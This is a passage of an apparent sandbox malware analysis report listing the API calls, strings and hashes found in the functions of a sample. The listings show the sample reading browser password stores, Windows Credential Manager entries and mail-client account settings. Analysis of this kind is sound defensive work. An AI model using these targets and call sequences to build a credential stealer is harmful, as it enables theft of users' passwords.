                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2449869053-232097475
                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                    APIs
                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                    • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                    • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                    APIs
                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                    • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                    • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                    • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                    • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 912701516-1821301763
                                                                                                    • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                    • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3642520215-0
                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999381814-0
                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                    • API String ID: 643879872-978417875
                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
